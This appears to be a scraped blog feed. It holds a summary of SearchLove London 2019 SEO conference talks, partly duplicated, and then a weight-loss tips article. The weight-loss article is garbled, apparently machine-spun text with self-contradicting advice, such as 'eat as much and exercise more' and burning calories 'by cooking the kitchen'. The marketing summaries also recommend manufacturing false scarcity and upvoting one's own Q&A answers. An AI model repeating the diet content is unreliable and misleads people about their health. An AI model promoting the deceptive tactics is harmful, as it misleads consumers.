Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Rory uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low value urls (faceted nav, query params, etc.) there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there are no one-size-fits all solutions. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things are categorised because sometimes keywords are really ambiguous. Often you can break these categories down into more specific categories.
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by -34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific directive to disallow Googlebot from /example, that is the one it will follow. Even if you specify that * (all user agents) are disallowed from /dont-crawl elsewhere in the file, Googlebot will only follow it’s set directive not to crawl /example and still be able to crawl /dont-crawl.
The Google documentation, robots.txt checker in  GSC, and the open source parser tend to disagree on what is allowed and disallowed. So, you’ll need to do some testing to ensure that the directives you’re setting are what you intended.
We often have  a lot of intuition about how things like pagerank work, but too many of our recommendations are based on misconceptions about how authority flows
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
from Marketing https://www.distilled.net/resources/searchlove-london-2019-round-up/ via http://www.rssmix.com/
0 notes
anthonykrierion · 5 years
Text
SearchLove London 2019: The Great Big Round Up
On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference.  All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year,  make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn’t contradict any known facts, something called scientific consensus. Site all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.  
Content needs to actually be about your business and local area. If you can use your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than competitors, then you’ll be one step ahead of competitors. 
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, review and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plugin other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behavior tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by incorporating two models to model clothing, to increase the likelihood of users identifying with their models
Purpose: People are more likely to buy when they feel they are contributing to a cause, for example, Pampers who has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic, paid content and the like all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverabilty powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
It’s not unlikely that merging teams too much can actually diminish agility. Depending on what marketing needs are at different times, allow for independence of teams when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use Regex. This gives a huge advantage over excel because it is far more efficient at allowing you to account for misspellings. This, for example, can give you a far more accurate chance at accounting for things like branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX, however, bear in mind that this often presents a host of SEO difficulties. Make sure that you don’t rely on the mobile friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (this is a common misconception!) The URL inspection tool is a bit better for checking this, however, bear in mind it’s more patient that Googlebot when it comes to rendering JavaScript, so isn’t 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
With changes in Google search appearance recently, ads have become more seamless in the SERP. This has led to paid click-through-rate rising a lot. However, if history is correct, then it will probably slowly decline until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Emily Potter - ‘Can Anything in SEO Be Proven? A Deep-Dive Into SEO Split-Testing’
Split testing SEO changes allow us to say with confidence whether or not a specific change hurts or helps organic traffic. Emily discusses various SEO split tests she’s run and potential reasons for their outcome.
The main levers for SEO tend to boil down to
1. Improving organic click-through-rate (CTR)
2. Improving organic rankings of current keywords
3. Ranking for new keywords
Split testing changes that we want to make to our site can help us to make business cases, rescue sessions, and gain a competitive advantage.
Determining which of the three levers causes a particular test to be positive or negative is challenging because since they all impact each other, the data is noisy. Measuring organic sessions relieves us of this noise.
Following “best practices” or what your competitors are doing is not always going to result in wins. Testing shows you what actually works for your site. For example, adding quantity of products in your titles or structured data for breadcrumbs might actually negatively impact your SEO, even if it seems like everyone else is doing so.
Check out Emily’s slides to see more split test case studies and learnings!
Lessons from another year in SEO A/B Testing - SearchLove London 2019 from Emily Potter
Jill Quick - ‘Segments: How To Get Juicy Insights & Avoid The Pips!’
In her excellent talk, Jill highlights how “average data gives you average insights”, and discusses the importance of segmenting your data to gain deeper insights into user behaviour. While analytics and segments are awesome, don’t become overwhelmed with the possibilities - focus on your strategy and work from there.
Jill’s other tips include:
Adding custom dimensions to forms on your website allows you to create more relevant and specific data segments
For example, if you have a website in the education sector, you can add custom dimensions to a form that asks people to fill in their profession.  You can then create a segment where custom dimension = headteacher, and you can then analyse the behaviour of this specific group of people
Build segments that look at your best buyers (people who convert well) as well as your worst customers (those who spend barely any time on site and never convert). You can learn a lot about your ideal customer, as well as what you need to improve on your site, by doing this.
Use your segments to build retargeting lists - this will usually result in lower CPAs for paid search, helping your PPC budget go further
Don’t forget to use advanced segments (using sequences and conditions) to create granular segments that matter to your business
You can use segments in Google Data Studio, which is awesome! Just bear in mind that in Data Studio you can’t see if your segment data is sampled, so it’s best to go into the GA interface to check
If you want to hear more about Jill's session, she's written a post to supplement her slides.
Segments in Google Analytics from The Coloring In Department
Rory Truesdale - ‘Using The SERPs to Know Your Audience’
It can be easy to get lost in evaluating metrics like monthly search volume, but we often forget that for each query, there is a person with a very specific motivation and need. Rory discussed how we can utilise Google’s algorithmic re-writing of the SERP to help identify those motivations and more effectively optimise for search intent - the SERPs give us amazing insight into what customers want!
Google rewrites the SERP displayed meta description 84% of the time (it thinks it’s smarter than us!) However, we can use this rewrite data to our advantage.
The best ways to get SERP data are through crawling SERPs in screaming frog, the scraper API or chrome extension, “Thruuu” (a SERP analysis tool), and then using Jupyter Notebooks to analyse it.
Scraping of SERPs, product reviews, comments, or reddit forums can be really powerful in that it will give you a data source that can reveal insight about what your customers want. Then you can optimise the content on your pages to appeal to them.
If you can get a better idea about what language and tone resonates with users, you can incorporate it into CTAs and content.
Check our Rory’s slides as well as the Jupyter notebook he uses to analyse SERP data.
SearchLove London 2019 - Rory Truesdale - Using the SERPs to Know Your Audience from Distilled
Miracle Inameti Archibong - ‘The Complete Guide To Actionable Speed Audits: Getting Your Developer To Work With You’
It can be a huge challenge to get devs to implement our wishlist of SEO recommendations. Miracle discussed the practical steps to getting developers to take your recommendations seriously.
If you take some time to understand the Web Dev roles at your company, then it will help you better communicate your needs as an SEO and get things rolled out. You can do this by:
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Rory uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low value urls (faceted nav, query params, etc.) there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there are no one-size-fits all solutions. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things are categorised because sometimes keywords are really ambiguous. Often you can break these categories down into more specific categories.
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by -34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific directive to disallow Googlebot from /example, that is the one it will follow. Even if you specify that * (all user agents) are disallowed from /dont-crawl elsewhere in the file, Googlebot will only follow it’s set directive not to crawl /example and still be able to crawl /dont-crawl.
The Google documentation, robots.txt checker in  GSC, and the open source parser tend to disagree on what is allowed and disallowed. So, you’ll need to do some testing to ensure that the directives you’re setting are what you intended.
We often have  a lot of intuition about how things like pagerank work, but too many of our recommendations are based on misconceptions about how authority flows
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
SearchLove London 2019: The Great Big Round Up was originally posted by Video And Blog Marketing
0 notes
peacekaleandyoga1 · 5 years
Link
Most people don’t like to avoid the truth about how they’re unhealthy and not think that that their weight may not be healthy. This involves giving serious thought to unpleasant health issues and eventualities. The following tips in the article below will help you out.
It is acceptable not finish your plate. Taking a doggy bag home with you after eating out is perfectly acceptable. Don’t just eat every last bite of food purely because it’s on your plate.
Pack a lunch each day to help you lose weight. Bringing your own lunch from home allows you to choose the foods you eat as well as the quantities. Controlling portions is something you should do if you want to weigh a good weight loss and keep on track.
TIP! A great way to lose some pounds is to only wear tight fitting clothing. Wearing loose fitting clothing may help overweight people forget about their weight problem.
Stay Active
Stay active during the day to lose weight quickly. An easy way to try to stay active all day is to avoid sitting down throughout the day.
You can shed extra weight simply by walking up and down the stairs instead of an elevator. While it might seem inconsequential, ditching the elevator and using the stairs, like not taking the elevator, can be an essential part of losing weight.
TIP! To lose weight, watch your calorie intake. If you eat more calories in a day than you burn, weight loss just is not going to happen.
Your weight loss goals must be realistic.Just like most other things, if the goal is not realistic, you are setting yourself up for failure. If you try to loose 15 pounds in a few weeks, then you are not giving yourself enough time to reach this goal and you will mostly fail. Instead of doing this, give yourself more time and set a goal that you may be able to attain for that specific week. Don’t start looking at the long run just yet. Concentrate on your weekly weight loss from week to week.
Never eat anything right before going to bed. If your bedtime is 10pm, avoid eating after 8pm. If you must have something, eat vegetables and wash them down with water. Although there may be times when you cannot stick to the two-hour rule, you should try to stick to it as often as you can. Your body will store the fat and calories that have not been metabolized when you go to sleep.
Talking weight loss is easier than actually getting started on a plan. You may wonder why you so long to start it.
TIP! When you are trying to shed weight, you should never feel ashamed that you have not finished your entire meal. Though many people are taught at an early age to clean their plate, it can cause internal struggles with those who battle to lose.
Plan meals in a diet. This can help you from making rash meal decisions that might not be healthy. Make sure that you adhere to your prescribed meal plans. You can feel free to switch the meals you have planned for one day with another, but don’t switch a healthy meal with McDonald’s. You can even burn some calories by cooking the kitchen.
If you possess a job that is full-time, bring a healthy lunch and snacks with you. This can make you want to eat junk food when getting home and that is not good for unhealthy junk.
Eating Healthy
TIP! You should spend most of your time with people who exercise and are otherwise active. Surrounding yourself with active people will encourage you to be active as well.
A dietician can help you to achieve a healthy and nutritious diet plan. The dietitian will educate you to ensure you are eating healthy foods. Eating healthy is the number one factor in weight loss plan.
Another key to weight is to eat everyday during the same times. It has scientifically been proven that people enjoy knowing when their next meal is and are less likely to search for other food. Try to create a timeframe when you can eat and try to keep to it.
The number one tip of all for weight loss is to eat as much and exercise more.
TIP! To help in your fight against the bulge, get an exercise buddy. This helps you to socialize so that you are having fun while burning calories.
If you work at a desk, you can still walk around the building during breaks to help you lose weight or prevent weight gain.
Eating a big breakfast, medium lunches, and small dinners can really boost weight loss. Eating your carbohydrates, meat, and carbs earlier can help.
Keep healthy snacks on hand. This will be available if you to have easy access to a snack that is much healthier than other convenience foods. This makes a great snack you can take with you.
TIP! To stay healthy, spread your eating habits out through the day. Having 5 or 6 small meals during the day is healthier than 3 large meals.
Weight Loss
A good way to be more fit is to go to bodybuilding websites and also some blogs that talk about weight loss. If you aren’t feeling up to the task of losing weight, you can view one of these sites to increase your motivation. Once you begin to read the positive and uplifting stories online, you will feel more inspired and be able to stick to your plan for whatever your weight loss goals may be.
Studies have shown that people who log their eating habits are more likely to continue to lose weight. They have been actually shown to lose twice as much compared to those who don’t keep track of what they eat.
TIP! Avoid eating before you go to bed. If you normally go to sleep around 10, then you should cut off your food intake by 8.
One important component in losing weight loss success is to increase your metabolism. You can speed up your metabolic rate with certain foods, which you can get from fish, walnuts and flax-seed oil.
Weight Loss
Real weight loss starts first in the mind and only after in the body. Once you decide that weight loss is important to you, you must maintain strong willpower if you hope to make it past the more difficult patches of your journey.
TIP! Try to avoid skipping meals. Try to eat roughly three daily meals.
Once you get started on a weight loss journey, you will find that it is not as terrible as you expected. Maintaining your weight can be a fickle thing. If you follow the tips in the article above, you should start seeing some weight loss success.
